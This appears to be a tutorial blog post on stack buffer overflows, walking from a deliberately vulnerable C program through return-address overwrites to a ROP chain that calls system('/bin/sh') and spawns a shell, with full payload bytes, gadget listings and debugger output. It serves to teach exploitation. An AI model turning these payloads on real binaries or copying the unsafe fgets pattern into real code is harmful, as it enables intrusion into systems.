How bad are buffer overflows?

TLDR: Pretty bad.

Most programmers and software-adjacent folks have heard that most security bugs are the product of a buffer overflow.

What is a buffer overflow, I hear you ask?

This:

#include <stdio.h>

int main() {
    char buffer[16];
    fgets(buffer, 64, stdin);
    puts(buffer);
    return 0;
}

It's pretty small, seemingly harmless, and if you haven't seen one before, you might not even see that it's there.

So, how is this a buffer overflow? As the name indicates, it is possible to overflow the buffer, that is, to fill the buffer with more data than it can hold.

This is possible in this sample because the buffer can hold 16 bytes, but fgets is allowed to write up to 64 bytes into it (63 characters plus a null terminator).

Let's take this code sample for a spin.

> ./buf_overflow
hello
hello

Alright, so I typed in hello, and I got hello, and it all terminated nicely. Ok, nothing wrong here.

Let's try a larger, more cordial greeting (politeness is key when overflowing buffers).

> ./buf_overflow
Hello, there, exquisite gentleperson
Hello, there, exquisite gentleperson

Job 1, './buf_overflow' terminated by signal SIGSEGV (Address boundary error)

Aha! An error! Looks like we smashed the stack by writing a lot of characters. 36 characters in fact, ignoring the newline and the null terminator.

Let's be a little more conservative, and only send 17 characters.

> ./buf_overflow 
Hello, there, Jim
Hello, there, Jim

Uh, nothing bad happened. But we did overflow the buffer. We just didn't cause enough damage.

Ok, so what is enough damage?

After some searching, we find that the shortest input that results in an error is 24 characters long.

> python -c "print('a' * 24)" | ./buf_overflow
aaaaaaaaaaaaaaaaaaaaaaaa

Process 57533, './buf_overflow' from job 1, '…' terminated by signal SIGSEGV (Address boundary error)

Now that we've found ourselves such a delightful fact: why 24?

Writing on the Stack

Recapping: our buffer can hold 16 bytes and we can write 64 bytes. After 24 bytes, we get an error.

First of all, where exactly are we overflowing out into? buffer is a local variable, so it lives on the stack¹.

[Figure: a simple stack layout example]

The stack is a handy region of memory that facilitates nested function calls and nested scoping in general. As I previously said, it also stores local variables, along with some other necessary information.

A very important piece of information that it stores is where a function should return to after finishing, which is stored in the return address.

In this scenario, we are overflowing in the main function, so our return address will point somewhere into the internals of libc, and we're not very interested in its particular value.

We are interested, however, in the fact that it is very important. If we happened to accidentally (or not so accidentally) overwrite the return address, the main function would finish and then jump to some corrupted memory address. The operating system is very much against this: it declares the process to be a big bully for not playing by the rules and aborts it.

Now, let's try and figure out why 24 is that magic sweet spot.

(pulls out a new sheet of internet paper)

[Figure: a simple stack layout example with annotated addresses]

Well, by fiddling around with gdb (or by using a suite of other amazing tools to inspect the stack), we can find out where in the stack buffer is, along with the return address.

In the diagram above, I've annotated some addresses that I extracted whilst debugging. As we can see, the buffer is at 0x7fffffffe050, and the return address is at 0x7fffffffe068. The frame base pointer essentially indicates where the main function's stack frame begins, and is not of much concern right now, besides the fact that it is on the stack.

There are 16 bytes reserved for the buffer. The frame base pointer and the return address are both pointers, each taking up a word of memory, which on my 64-bit system is, you guessed it, 64 bits, or 8 bytes. So, from the start of the buffer to the start of the return address, there are $16 + 8 = 24$ bytes.

We could also just subtract both addresses, but I find this to be more pedagogical (and handier, when you don't know the addresses explicitly).
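
For the skeptics, here is that same arithmetic done both ways as a tiny Python sketch. The addresses are the ones from my gdb session (yours will differ), and the variable names are just ones I made up for illustration.

```python
# Addresses taken from the gdb session described above; they differ per machine and run.
BUFFER_ADDR = 0x7fffffffe050
RETURN_ADDR_SLOT = 0x7fffffffe068

BUFFER_SIZE = 16  # char buffer[16]
WORD_SIZE = 8     # one pointer on a 64-bit system (the frame base pointer slot)

offset_by_subtraction = RETURN_ADDR_SLOT - BUFFER_ADDR
offset_by_layout = BUFFER_SIZE + WORD_SIZE

print(offset_by_subtraction, offset_by_layout)  # 24 24
```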

So, that is where our magical number 24 comes from. Hmmm, in fact, let me just have another quick look with gdb.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7da000a in ?? () from /usr/lib/libc.so.6

Ok, so by using python -c "print('a' * 24)" as an input, the corrupted return address is 0x00007ffff7da000a.

With just a as the input, the correct return address is 0x7ffff7da5c88:

  0x55555555517b <main+50>    ret <0x7ffff7da5c88> 
    ↓
 ► 0x7ffff7da5c88             mov    edi, eax

We can see that the four least significant hex digits of the correct address were overwritten, from 0x5c88 to 0x000a.

The reason is that our input, python -c "print('a' * 24)", is actually 24 a's followed by a newline, and fgets appends a null terminator once it is done reading.

> python -c "print('a' * 24)" | hexdump
0000000 6161 6161 6161 6161 6161 6161 6161 6161
0000010 6161 6161 6161 6161 000a 
0000019

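(Notice the 000a at the end of the hexdump! The 0a is the newline. The 00 next to it is just hexdump padding out its last two-byte word; the actual null terminator is the one that fgets appends.)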

So we actually wrote a newline and a null terminator onto the return address and broke everything!
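
If you'd rather see that on paper than take gdb's word for it, here is a small Python model of the stack frame. It is only a sketch: it assumes the layout described above (16-byte buffer, 8-byte frame base pointer, 8-byte return address) and uses the return address I saw in gdb, which will differ on your machine.

```python
ORIGINAL_RETURN = 0x7ffff7da5c88  # value seen in gdb with a short input
OFFSET = 24                       # bytes from the start of the buffer to the return address

# Model of the frame: 24 bytes of buffer + frame base pointer, then the return address.
frame = bytearray(OFFSET) + bytearray(ORIGINAL_RETURN.to_bytes(8, "little"))

# What fgets stores for this input: the line, its newline, then a null terminator.
written = b"a" * 24 + b"\n" + b"\x00"
frame[:len(written)] = written

corrupted = int.from_bytes(frame[OFFSET:OFFSET + 8], "little")
print(hex(corrupted))  # 0x7ffff7da000a
```

Only the two lowest bytes of the return address change, which is exactly the 0x5c88 to 0x000a switch from the debugger.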

Alright, alright, we crashed a simple program with a buffer overflow, but how does this create a security vulnerability?

Why are buffer overflows so bad?

Well, we only wrote a newline and a null byte. But we can do so, oh so much more. This right here, was the 'hammer it to break it' approach.

It's time to get surgical.

Jumping to other functions

Let's say, for demonstration's sake, that we had this function in our program:

void print_secret() { puts("My really secret value: \x34\x32"); }

Now, I really want to find what the secret value is.
But the function is not called anywhere in the source code. You might say "There is no way that we can find the secret!", but I beg to differ.

We just established that we can overwrite the return address of a function. We only overwrote it accidentally, but we can be a tad bit more precise.

If instead of the newline and null terminator we were able to place a valid address, we could jump execution to that address. In theory.

First of all, we need the address of the function that we want to jump to. With gdb, we can find that the address is 0x55555555516f:

pwndbg> p print_secret
$2 = {void ()} 0x55555555516f <print_secret>

Alright, now we need to overwrite the return address of main to jump to print_secret. We can't just input aaaaaaaaaaaaaaaaaaaaaaaa0x55555555516f, since the address would be read as ASCII characters, whose byte values are different from the actual address bytes. Have a look:

> echo "aaaaaaaaaaaaaaaaaaaaaaaa0x55555555516f" > payload
> gdb buf_overflow 
pwndbg> r < payload
► 0x5555555551b7 <main+50>    ret    <0x3535353535357830>

So yeah, the return address is absolutely mangled and not what we wanted: 0x3535353535357830.
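
Where does that mangled value come from? A quick Python sketch reproduces it: the first 8 characters we typed after the padding are simply read as 8 raw bytes. The variable names are mine, nothing here comes from the binary.

```python
typed = b"0x55555555516f"  # the 14 ASCII characters appended after the 24 a's
slot = typed[:8]           # only the first 8 bytes land in the 8-byte return address

print(slot)                                 # b'0x555555'
print(hex(int.from_bytes(slot, "little")))  # 0x3535353535357830
```

The character '0' is byte 0x30, 'x' is 0x78 and '5' is 0x35, so we get a pile of 0x35s instead of 0x55s.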

What we really need to do is input the raw bytes of the address, in little endian byte order. Why little endian? Well... (flashbacks to the Great Endian war of Standardization) it just is how x86-64 stores multi-byte values in memory.

So, 0x55555555516f in little endian would be 0x6f, 0x51, 0x55, 0x55, 0x55, 0x55.
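
If flipping bytes by hand isn't your thing, Python's struct module can do it. This is a minimal sketch: the address is the one gdb gave me for print_secret (yours will differ), and I'm assuming the two highest bytes of the old return address were already zero, which matches the addresses seen in gdb, so sending only the six low bytes is enough.

```python
import struct

PRINT_SECRET = 0x55555555516f  # from `p print_secret` in gdb; differs per build

packed = struct.pack("<Q", PRINT_SECRET)  # "<Q": little-endian unsigned 64-bit
print(packed.hex(" "))                    # 6f 51 55 55 55 55 00 00

# 24 bytes of padding, then the six low bytes of the address.
payload = b"a" * 24 + packed[:6]
print(len(payload))                       # 30
```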

The way we exploit this buffer overflow, then, is by injecting the function's address in little endian after the string of a's.

> echo -e -n "aaaaaaaaaaaaaaaaaaaaaaaa\x6f\x51\x55\x55\x55\x55" > payload
> ./buf_overflow < payload
aaaaaaaaaaaaaaaaaaaaaaaaoQUUUU
My really secret value: 42
Job 1, './buf_overflow < payload' terminated by signal SIGSEGV (Address boundary error)

Haha! We leaked the secret!

If we inspect a little bit further with gdb, we can see that the address was correctly overwritten.

► 0x5555555551b7 <main+50>      ret  <0x55555555516f; print_secret>
   ↓
  0x55555555516f <print_secret> push   rbp

So, with a buffer overflow, and by knowing a function's address, we can call that function, if we so please!

I trust that you, dear reader, are starting to see just how dangerous a buffer overflow can get.

Running a Shell

Let's ramp this up a notch. If there are skeptical readers among you who think that being able to call a function by knowing its address is interesting, but not very dangerous, then this section is for you.

We can have some fun of our own without strictly relying on the functions already present in the source code. In this section, I'm going to show you how you can start a shell with a buffer overflow.

Static Linking

For simplicity's sake, I'm going to recompile the source code above as a statically linked binary. If you are unaware, static linking essentially means that the functions from the C Standard Library that the source code uses are also placed inside the binary.

If the binary isn't statically linked, then the following exploits are still possible, but with a bit more effort².

We can see that the binary is statically linked by using the file command:

> file buf_overflow
buf_overflow: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=791d87c05f1150e6e9df551870c5f25f2fb75284, for GNU/Linux 4.4.0, with debug_info, not stripped

The way that this helps us is that, besides jumping around functions in the source code, we can also jump into functions in libc, and because the binary is statically linked, we can find their addresses just as easily.

For example, we can find the address of the exit function:

> gdb buf_overflow 
pwndbg> p exit 
$1 = {<text variable, no debug info>} 0x4047c0 <exit>

(You may notice that the address of exit is a bit shorter than print_secret's. This is because I recompiled the binary statically, and the executable data region has changed. print_secret is, in fact, now at 0x40187b.)

We can therefore call exit, which is provided by libc, by placing its address in the payload:

> echo -e -n "aaaaaaaaaaaaaaaaaaaaaaaa\xc0\x47\x40" > payload
> ./buf_overflow < payload
aaaaaaaaaaaaaaaaaaaaaaaaG@
> echo $status
160

We can check that exit was indeed called by noticing that there was no Segmentation Fault and a non-zero exit code was set.

We can try to call system, by finding its address:

> gdb buf_overflow 
pwndbg> p system
$1 = {<text variable, no debug info>} 0x404c70 <system>

But we would be calling system without providing an argument; whatever junk happens to reside in memory or registers would end up getting passed to it. So how do we manipulate function call arguments?

Manipulating Arguments

The ways in which we can pass arguments to function calls are many, but in the end, they boil down to the same principle: place the arguments you want in the place they are supposed to be (shocking, I know).

So, if the argument to a function has to be at a certain address in the stack, then you have to place your value at that address. More sneakily, if the argument needs to be at a certain offset from the base pointer of the function frame, then you can even manipulate the base pointer of the frame itself, and use values already in memory!

If the argument to the function needs to be in a certain register, then you need to overwrite that register. If overwriting isn't possible, you might call the function at a time when the value you want is already inside that register.

There are many, many, many, ways of doing things, but I'm going to start off somewhat simple.

First of all, we need to figure out where the arguments are passed in.

32-bit vs 64-bit

In the olden days (and today), 32-bit binaries passed function call arguments on the stack. Before calling a function foo(int a, int b), what the function caller would do is push the values of b and a onto the stack (in reverse order of the arguments in the function signature), then push the return address and create the new function frame.

To my knowledge, this was done due to the limited number of registers on 32-bit architectures.

In 64-bit binaries (on Linux, at least), with all of the new registers we have, we now pass arguments in registers! Only the first six of them though; we still have limited registers and we have to be somewhat frugal. From the seventh argument onwards, arguments are passed through the stack, as they were in 32-bit.

We have a 64-bit binary, so we will need to overwrite a certain register. Which one though?

Let's disassemble the system function and find out! (Everything is open source if you can reverse engineer it).

I'll be using radare2 to disassemble system, since radare gives us some parameter hints along with pretty disassembly.

> r2 -A buf_overflow
[...]
[0x00401740]> s sym.system 
[0x00404c70]> pdf
   ╎   ;-- __libc_system:
   ╎   ; CALL XREF from dbg.handy_backdoor @ 0x401873(x)
┌ 40: int sym.system (const char *string);
│  ╎   ; arg const char *string @ rdi
│  ╎   ; arg int64_t arg2 @ rsi
│  ╎   0x00404c70      f30f1efa       endbr64
│  ╎   0x00404c74      4885ff         test rdi, rdi         ; string
│ ┌──< 0x00404c77      7407           je 0x404c80
│ │└─< 0x00404c79      e962fbffff     jmp sym.do_system
..
│ │    ; CODE XREF from sym.system @ 0x404c77(x)
│ └──> 0x00404c80      55             push rbp
│      0x00404c81      488d3d7968..   lea rdi, str.exit_0   ; 0x47b501 ; "exit 0" ; int64_t arg1
│      0x00404c88      4889e5         mov rbp, rsp
│      0x00404c8b      e850fbffff     call sym.do_system
│      0x00404c90      5d             pop rbp
│      0x00404c91      85c0           test eax, eax
│      0x00404c93      0f94c0         sete al
│      0x00404c96      0fb6c0         movzx eax, al
└      0x00404c99      c3             ret
[0x00404c70]>

We can see that radare tells us that the first argument, which is a const char* called string is passed in the register rdi. Great! So we need to overwrite rdi and we can pass arguments to system!
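
radare's hint agrees with the calling convention used on 64-bit Linux (the System V AMD64 ABI), which I haven't spelled out in this post. As a rough sketch, and only for integer and pointer arguments, the lookup goes like this. The function name is something I made up for illustration.

```python
# Register order for integer/pointer arguments in the System V AMD64 ABI (64-bit Linux).
INT_ARG_REGISTERS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def argument_location(index):
    """Where the index-th (0-based) integer or pointer argument is passed."""
    if index < len(INT_ARG_REGISTERS):
        return INT_ARG_REGISTERS[index]
    return "stack"

print([argument_location(i) for i in range(8)])
# ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9', 'stack', 'stack']
```

system takes a single pointer argument, so it is argument 0, and that lands in rdi.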

But, uhm, how do we actually overwrite it? By jumping around, that's how.

ROP - Return Oriented Programming

We already saw how we can jump to an arbitrary memory address in the binary by overwriting a function's return address. Now it's time to punch this up to 11. We're going to be jumping several times around our binary.

How? By exploiting ret instructions in the binary. In particular, we'll be making use of sections of code that end in a ret instruction, normally called "gadgets".

The way that ret works is the following: Executing ret pops a value off of the stack and places it in the instruction pointer. That way, execution jumps to the address that was on the stack (or absolutely breaks down if the value wasn't a valid address).

So, the trick we're going to use is to write the addresses of several of these gadgets onto the stack. When execution reaches the end of a gadget, its ret is executed, and since the next value on the stack is the address of our next gadget, the program jumps to it. The gadgets chain each other on.

This is the key idea behind Return Oriented Programming, or ROP, for short.
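
To make the chaining a bit more tangible, here is a toy model in Python. It is very much a sketch and not how a CPU works: the gadget addresses (0x1000, 0x2000) and their contents are hypothetical, and the only instructions it understands are pop and ret.

```python
def run_chain(stack, gadgets):
    """Toy model of ret-chaining. `stack` is what we wrote from the return address onwards."""
    regs = {}
    trace = []
    stack = list(stack)
    while stack:
        addr = stack.pop(0)       # `ret`: pop the next value into the instruction pointer
        name, pops = gadgets[addr]
        for reg in pops:          # each `pop reg` consumes the next value on the stack
            regs[reg] = stack.pop(0)
        trace.append(name)        # the gadget ends in `ret`, so we loop around
    return regs, trace

# Hypothetical gadgets, keyed by made-up addresses.
gadgets = {
    0x1000: ("pop rax ; ret", ["rax"]),
    0x2000: ("pop rbx ; ret", ["rbx"]),
}

regs, trace = run_chain([0x1000, 7, 0x2000, 9], gadgets)
print(regs)   # {'rax': 7, 'rbx': 9}
print(trace)  # ['pop rax ; ret', 'pop rbx ; ret']
```

The stack is just a list of addresses and values interleaved: every address is consumed by a ret, and every value is consumed by a pop.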

Now, let's get down to details. What do we have to do, and where do we have to jump to? Well, we have to overwrite rdi somehow, so we'll need a gadget that can write into rdi any value that we want.

Let's look for one. To do that I'll be using a nifty tool called ROPgadget that can list out all the gadgets in a binary, filter them, generate a complete chain of gadgets that will give you a complete shell automatically (this is pretty busted, ngl), etc.

> ROPgadget --binary buf_overflow 
Gadgets information
============================================================
0x0000000000453275 : adc ah, bh ; jmp 0x453173
0x000000000041765d : adc ah, bh ; ret
0x0000000000447d82 : adc al, 0 ; add byte ptr [rax - 0x7d], cl ; ret 0x4910
0x0000000000447dd7 : adc al, 0 ; add byte ptr [rax - 0x7d], cl ; ret 0xe910
0x0000000000466507 : adc al, 0 ; add byte ptr [rax], al ; jmp 0x4660e0
0x0000000000471748 : adc al, 0 ; add byte ptr [rax], al ; leave ; ret
0x0000000000420835 : adc al, 0 ; add byte ptr [rax], al ; syscall
0x0000000000465ed2 : adc al, 0 ; add byte ptr [rax], al ; xor eax, eax ; jmp 0x465ea6
0x000000000044ea48 : adc al, 0 ; add byte ptr [rbp - 0x77], cl ; retf
0x000000000044eabf : adc al, 0 ; add byte ptr [rcx - 0x7d], cl ; jmp 0x44ead6
0x0000000000457707 : adc al, 0x11 ; mov byte ptr [rax - 1], dl ; jmp 0x457678
0x000000000041bd81 : adc al, 0x11 ; mov qword ptr [rax + 8], rdx ; ret
0x0000000000433476 : adc al, 0x16 ; jmp 0x432ab4
0x00000000004374dc : adc al, 0x16 ; jmp 0x437177
0x000000000044c399 : adc al, 0x16 ; sub eax, edx ; ret
0x00000000004591a9 : adc al, 0x24 ; jmp 0x458d29
0x000000000041a6c1 : adc al, 0x25 ; sub byte ptr [rax], al ; add byte ptr [rax], al ; jne 0x41a70b ; leave ; ret
0x000000000041a756 : adc al, 0x25 ; sub byte ptr [rax], al ; add byte ptr [rax], al ; jne 0x41a79b ; leave ; ret
[ ... Several hundreds of lines follow ... ]

Since the binary is statically linked, the list is massive, so I'll try and narrow it down. I have an idea of what I'm looking for, so I'm going to go and filter this list.

> ROPgadget --binary buf_overflow --re "pop rdi"
0x000000000046322e : pop rdi ; pop rbp ; jmp 0x462bf0
0x0000000000475ac5 : pop rdi ; pop rbp ; jmp 0x475700
0x00000000004280e7 : pop rdi ; pop rbp ; jmp r10
0x000000000042752a : pop rdi ; pop rbp ; jmp rax
0x000000000040216d : pop rdi ; pop rbp ; ret
0x00000000004402cd : pop rdi ; stosd dword ptr [rdi], eax ; cld ; dec dword ptr [rax - 0x75] ; jge 0x4402bd ; jmp 0x44026f
0x0000000000470ade : pop rsi ; pop rdi ; mov rcx, rax ; jmp 0x470a2e
0x0000000000417de3 : ror byte ptr [rax - 0x7d], 0xef ; pop rdi ; add rax, rdi ; jmp 0x417c82
0x00000000004184f3 : ror byte ptr [rax - 0x7d], 0xef ; pop rdi ; add rax, rdi ; jmp 0x41851e
0x0000000000451413 : ror byte ptr [rax - 0x7d], 0xef ; pop rdi ; add rax, rdi ; jmp 0x4514f9
0x0000000000411a91 : stosd dword ptr [rdi], eax ; pop rdi ; add byte ptr [rax], al ; cmovne rax, rdx ; ret
0x0000000000454dce : xor ebp, ebp ; pop rax ; pop rdi ; call rax
[...]

Alright, we've got a pretty good gadget at address 0x000000000040216d: pop rdi ; pop rbp ; ret.

An ideal gadget would have been pop rdi; ret, since we could just pop a value off the stack into rdi, and that'd be it, but alas, we have no such gadget in our binary. That would be too easy. So, we have a pop rbp tagging along. But this is manageable.

What we need to do now, is overwrite the return address of main with our gadget's address, and place on the stack, after the return address, the value we want to overwrite rdi with, some dummy value for rbp and then the address of system.

This way, we ret into system with the value that we want in rdi.

Let's give it a try!

Executing the ROP Chain

So our input has to start with the chain of 'a's that pads up to the return address, which is 24 'a's. Then it needs the address of the gadget, in little endian, which is \x6d\x21\x40\x00\x00\x00\x00\x00. After that, we place the value that we want rdi to have; for now I'll just place a 1 (\x01\x00\x00\x00\x00\x00\x00\x00). Then we add some dummy bytes because of pop rbp (aaabaaac). Then we place the address of system, in little endian, which is \x70\x4c\x40\x00\x00\x00\x00\x00.

Got it? I can't know your answer, so, if you did, great job! If not, re-read it a couple of times, or skip ahead if you wish. I don't mind (I too do this).

The full chain is the following:

aaaaaaaaaaaaaaaaaaaaaaaa\x6d\x21\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00aaabaaac\x70\x4c\x40\x00\x00\x00\x00\x00
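
Typing that out by hand is error-prone, so here is the same chain built piece by piece in Python. Treat it as a sketch: the two addresses are the ones from my statically linked build (yours will differ), and build_chain is just a helper name I picked.

```python
import struct

POP_RDI_POP_RBP_RET = 0x40216d  # gadget found with ROPgadget in my build
SYSTEM = 0x404c70               # from `p system` in gdb, in my build

def build_chain(rdi_value):
    return b"".join([
        b"a" * 24,                               # padding up to the return address
        struct.pack("<Q", POP_RDI_POP_RBP_RET),  # overwrites main's return address
        struct.pack("<Q", rdi_value),            # popped into rdi
        b"aaabaaac",                             # dummy value popped into rbp
        struct.pack("<Q", SYSTEM),               # the gadget's ret jumps here
    ])

chain = build_chain(1)
print(len(chain))     # 56
print(b"\n" in chain)  # False
```

Two things worth checking before sending it: the chain is 56 bytes, which fits within the 63 that fgets will read, and it contains no newline byte, since fgets stops reading at a newline (zero bytes are fine).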

Let's try it out!

> echo -e -n "aaaaaaaaaaaaaaaaaaaaaaaa\x6d\x21\x40\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00aaabaaac\x70\x4c\x40\x00\x00\x00\x00\x00" > payload 
> gdb buf_overflow
pwndbg> b system
pwndbg> r < payload
[...]
Breakpoint 1, 0x0000000000404c70 in system ()
 ► 0x404c70 <system>          endbr64 
   0x404c74 <system+4>        test   rdi, rdi
   0x404c77 <system+7>        je     404c80h      <system+16>
pwndbg> p $rdi
$1 = 1

Success! We jumped to system with rdi having value 1!

Alright, we are only one step away from completing our shell takeover. We can't stop now! Time to crack this open!

Finding /bin/sh

To crack open a shell, we need to pass the string "/bin/sh" as the argument to system. There are, as always, many ways to do this:

- You could inject the string into the buffer you overflowed and then pass the buffer's address as the argument.
- Or, if the string is already present in the binary, just pass its address.

Since our binary is statically linked, we can just find the string in our binary.

I'll be using radare, once again, to do this:

> r2 -A buf_overflow
[...]
[0x00401740]> / /bin/sh
0x0047b4f9 hit0_0 .c != NULL-c--/bin/shexit 0 glibc: .

So, we have the string "/bin/sh" at address 0x0047b4f9. All we need to do now is pass 0x0047b4f9 as the argument instead of 1.

Putting it all together

By writing the address of "/bin/sh" in little endian on the chain, the final ROP chain ends up being:

aaaaaaaaaaaaaaaaaaaaaaaa\x6d\x21\x40\x00\x00\x00\x00\x00\xf9\xb4\x47\x00\x00\x00\x00\x00aaabaaac\x70\x4c\x40\x00\x00\x00\x00\x00

Which is pretty incomprehensible, but it should get the job done.
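
To make it a little less incomprehensible, we can take the chain apart again. This Python sketch simply unpacks the bytes above back into 64-bit values; the variable names are mine.

```python
import struct

final_chain = (
    b"a" * 24
    + b"\x6d\x21\x40\x00\x00\x00\x00\x00"
    + b"\xf9\xb4\x47\x00\x00\x00\x00\x00"
    + b"aaabaaac"
    + b"\x70\x4c\x40\x00\x00\x00\x00\x00"
)

# The first 24 bytes are padding; the rest is four little-endian 64-bit values.
padding, rest = final_chain[:24], final_chain[24:]
gadget, rdi_value, rbp_value, target = struct.unpack("<4Q", rest)

print(hex(gadget))                      # 0x40216d  (pop rdi ; pop rbp ; ret)
print(hex(rdi_value))                   # 0x47b4f9  (address of "/bin/sh")
print(rbp_value.to_bytes(8, "little"))  # b'aaabaaac' (dummy for pop rbp)
print(hex(target))                      # 0x404c70  (system)
```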

Here's what happens when we try to run it:³

> echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaa\x6d\x21\x40\x00\x00\x00\x00\x00\xf9\xb4\x47\x00\x00\x00\x00\x00aaabaaac\x70\x4c\x40\x00\x00\x00\x00\x00" > payload
> ./buf_overflow < payload
aaaaaaaaaaaaaaaaaaaaaaaam!@
ls
buf_overflow  buf_overflow.c  Makefile  payload 
whoami
jpl

SUCCESS!!

We have ourselves a shell! From here, we can fiddle around with the system, create files, read files, open network connections, all the fun, dangerous, extremely scary things remote shells can do.

Wrapping Up

So, to answer the main question of this post: How bad are buffer overflows?

Very bad.

Not because buffer overflows are dangerous by themselves, but because they open up an extremely wide range of possible exploits.

Once you open up the floodgates of being able to overwrite some piece of data on the stack, especially return addresses, you can start composing techniques together into something that could end up being a very nasty exploit. You could start ROP'ing around and try to system into a shell. If that isn't possible, you can try to ROP through an execve into a shell. If that isn't possible, you can try to ROP into syscalls to try and read/write from/to files. You can skip ROP and jump to a one_gadget into a shell, etc.

And even though I haven't covered them here, some defenses such as ASLR and PIE can be sidestepped via leaking addresses, which is also possible via buffer overflows.

Buffer overflows are a pristine red carpet into exploiting a binary, and there are a lot of buffer overflows out in the wild.

Repeat after me, buffer overflows, very, very, bad.

¹ It is not actually guaranteed that local variables live on the stack. It is up to the compiler where local variables are stored, but most compilers place them on the stack, so I'm going to keep referring to them as living on the stack.

² If the binary isn't statically linked, but you know the libc being used, you can still find the addresses of functions in libc by knowing the libc's base address after linking, which you can find via address leaks.

³ Weirdly enough, running it directly on the shell wasn't working for me, but running it through pwntools or gdb with the exact payload works. ¯\_(ツ)_/¯. The output you see was run through gdb.